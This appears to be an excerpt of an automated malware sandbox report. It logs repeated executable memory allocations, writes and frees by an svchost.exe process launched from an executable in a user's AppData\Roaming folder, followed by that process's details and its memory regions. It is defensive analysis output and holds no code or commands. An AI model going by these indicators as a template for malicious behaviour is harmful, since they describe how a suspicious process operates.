Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20016, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190b8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624776	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 25	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18c948, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624312	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18c9a8, free_type = MEM_RELEASE, size = 1624472	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20029, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cad8, free_type = MEM_RELEASE, size = 1624784	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 22	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20026, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019000, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624776	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 19	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18c948, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624312	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18c9a8, free_type = MEM_RELEASE, size = 1624472	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20023, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cad8, free_type = MEM_RELEASE, size = 1624784	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 21	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20025, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019298, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 15	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001f, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400192a0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624776	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 25	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18c948, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624312	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18c9a8, free_type = MEM_RELEASE, size = 1624472	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20029, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cad8, free_type = MEM_RELEASE, size = 1624784	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18cd40, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625280	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20000, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190c8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd40, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625280	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20000, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190d0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd40, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625280	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20000, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190d8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd40, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625280	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20000, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190e0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd40, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625280	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20000, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190e8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cd38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624776	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 23	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18c948, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624312	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18c9a8, free_type = MEM_RELEASE, size = 1624472	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20027, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cad8, free_type = MEM_RELEASE, size = 1624784	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 19	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20023, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400190f8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 19	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20023, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019100, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 17	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20021, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019108, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 15	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001f, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019110, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 19	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20023, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019118, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 20	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20024, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019120, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20020, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019128, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20020, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019130, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 19	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20023, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019138, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 12	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001c, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019140, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 26	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2002a, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019148, size = 8	1	Fn Data
For performance reasons, the remaining 98 entries are omitted. The remaining entries can be found in glog.xml.

Process #8: svchost.exe

(Host: 311, Network: 25)

Information	Value
ID	#8
File Name	c:\windows\system32\svchost.exe
Command Line	svchost.exe
Initial Working Directory	C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\
Monitor	Start Time: 00:01:39, Reason: Child Process
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:00:47

OS Process Information

Information	Value
PID	0x830
Parent PID	0xb68 (c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 840 0x 8AC 0x 900 0x 8FC 0x 938 0x 964 0x 8D0 0x 984

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
